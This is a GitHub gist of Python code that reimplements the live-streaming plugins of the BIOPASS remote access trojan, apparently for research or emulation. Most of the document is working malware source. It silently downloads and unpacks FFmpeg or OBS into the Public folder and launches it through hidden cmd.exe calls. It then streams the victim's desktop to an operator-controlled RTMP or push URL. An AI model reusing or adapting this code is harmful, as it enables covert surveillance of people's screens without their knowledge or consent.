Skip to content

Instantly share code, notes, and snippets.

@Und3rf10w
Last active July 15, 2021 10:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Und3rf10w/d02b134c9f5aa3401e76db825aa8f941 to your computer and use it in GitHub Desktop.
Save Und3rf10w/d02b134c9f5aa3401e76db825aa8f941 to your computer and use it in GitHub Desktop.
Implementation of plugins.Open_Obs_live and plugins.OpenFFmpegLive from BIOPASS RAT as seen in: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
# Author: @Und3rf10w
# See: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
# You'd still have to set up the client config and define certain parameters. Leaving this neutered as is for now
import json
import win32com.client
import win32con, win32gui, win32print
import win32api
import os
import traceback
import zipfile
import requests
import time
# TODO:
# - Setup client.parameters['Bitrate','FPS',rtmp_key','rtmp_server','download_url', 'push_url']
def Common_shell_exec_A(commands="", runpath=""):
try:
if runpath == "":
runpath = os.getenv('temp')
# Common_xlog("shell_exec_A:" + commands + " path:"+runpath)
win32api.ShellExecute(0, 'open', 'cmd.exe', f"/c {commands}", runpath, 0)
except:
# Common_xlog('shell_exec_a Error:' + traceback.format_exc())
return {'status': False, 'result': traceback.format_exc()} # Added for debug
def Common_download_file(download_url, download_path):
try:
download_response = requests.get(download_url)
download_response.raise_for_status()
destination_file = open(download_path, 'wb')
for chunk in download_response.iter_content(100000):
destination_file.write(chunk)
destination_file.close()
return {'status': True, 'result': 'Download file success'}
except:
return {'status': False, 'result': traceback.format_exc()}
class Decompress_file:
def __init__(self, parameters):
self.parameters = parameters
self.result = {'status': False, 'result': 'No Result'}
def execute(self):
try:
zip_location = zipfile.ZipFile(self.parameters['zip_src'], 'r')
for zipped_file in zip_location.namelist():
zip_location.extract(zipped_file, self.parameters['dst_dir'])
self.result = {'status': True, 'result': 'success'}
except:
self.result = {'status': False, 'result': traceback.format_exc()}
class Close_FfmpegLive:
def __init__(self, parameters):
self.parameters = parameters
self.result = {'status':False, 'result': 'No Result'}
def execute(self):
try:
command = Common_shell_exec_A('TASKKILL /F /IM ffmpeg.exe')
time.sleep(1)
self.result = {'status': True, 'result': str(command)}
except:
self.result = {'status': True, 'result': traceback.format_exc()}
class Open_FfmpegLive:
def __init__(self, parameters):
self.parameters = parameters
self.result = {'status': False, 'result': 'No Result'}
def execute(self):
try:
ffmpeg_path = os.path.join(os.getenv('public'), 'ffmpeg.exe')
if not os.path.exists(ffmpeg_path):
ffmpeg_zip_path = os.path.join(os.getenv('public'), 'ffmpeg.zip')
Common_download_file(self.parameters['download_url'], ffmpeg_zip_path)
decompress_ffmpeg=Decompress_file({'zip_src': ffmpeg_zip_path, 'dst_dir': os.getenv('public')})
decompress_ffmpeg.execute()
try:
os.remove(ffmpeg_zip_path)
except:
pass
command = win32api.ShellExecute(0, 'open', ffmpeg_path, f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}", os.getenv('public'), 0)
# Common_xlog('args:' + f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}")
# Common_xlog('ffresult:'+str (command))
self.result = {'status': True, 'result': 'Start live broadcast success'}
except:
self.result = {'status': False, 'result': traceback.format_exc()}
class Close_Obs_Live:
def __init__(self, parameters):
self.parameters = parameters
self.result = {'status':False, 'result': 'No Result'}
def execute(self):
try:
Common_shell_exec_A('TASKKILL /F /IM obs64.exe')
time.sleep(1)
self.result = {'status': True, 'result': 'Close OBS Success'}
except:
self.result = {'status': True, 'result': traceback.format_exc()}
class Open_Obs_live:
def __init__(self, client_parameters):
self.result = {'status': False, 'result': 'No Result'}
self.parameters = client_parameters
self.basic_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles',
'abcd', 'basic.ini')
self.rtmp_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles',
'abcd', 'service.json')
win32_device_capabilities = win32gui.GetDC(int(self.parameters['MonitorID']))
self.width = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPHORZRES)
self.height = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPVERTZRES)
self.obs_dir = os.path.join(os.getenv('public'), 'OBS', 'bin', '64bit')
self.obs_bin_name = 'obs64.exe'
self.obs_path = os.path.join(self.obs_dir, self.obs_bin_name)
if not os.path.exists(self.obs_path) or not os.path.exists(self.basic_config_path):
local_obs_zip_path = os.path.join(os.getenv('public'), 'obs.zip')
Common_download_file(self.parameters['download_url'], local_obs_zip_path) # download from $0 to $1
unzip_obs = Decompress_file({'zip_src': local_obs_zip_path, 'dst_dir': os.getenv('public')})
unzip_obs.execute()
try:
os.remove(local_obs_zip_path)
except:
pass
def config(self):
try:
obs_config = f'''[General]
Name=abcd
[Video]
BaseCX={self.width}
BaseCy={self.height}
OutputCX={self.width}
OutputCY={self.height}
FPSType=0
FPSCommon={self.parameters['FPS']}
[Panels]
CookieId=A35038958F3C987F
[SimpleOutput]
VBitrate={self.parameters['Bitrate']}
StreamEncoder=x264
RecQuality=Stream
[Output]
Mode=Simple
'''
rtmp_config = {
"settings": {"bwtest": False, "key": self.parameters['rtmp_key'], "server": self.parameters['rtmp_server'],
"use_auth": False}, "type": "rtmp_custom"}
with open(self.basic_config_path, 'w') as f:
f.write(obs_config)
f.close()
with open(self.rtmp_config_path, 'w') as f:
f.write(json.dumps(rtmp_config, sort_keys=True, indent=4))
except:
self.result = {'status': False, 'result': traceback.format_exc()}
def execute(self):
try:
self.config()
Common_shell_exec_A(self.obs_path + " -p", self.obs_dir) # -p = "Use portable mode"
self.result = {'status': True, 'result': 'Open OBS Live Success'}
except:
self.result = {'status': False, 'result': traceback.format_exc()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment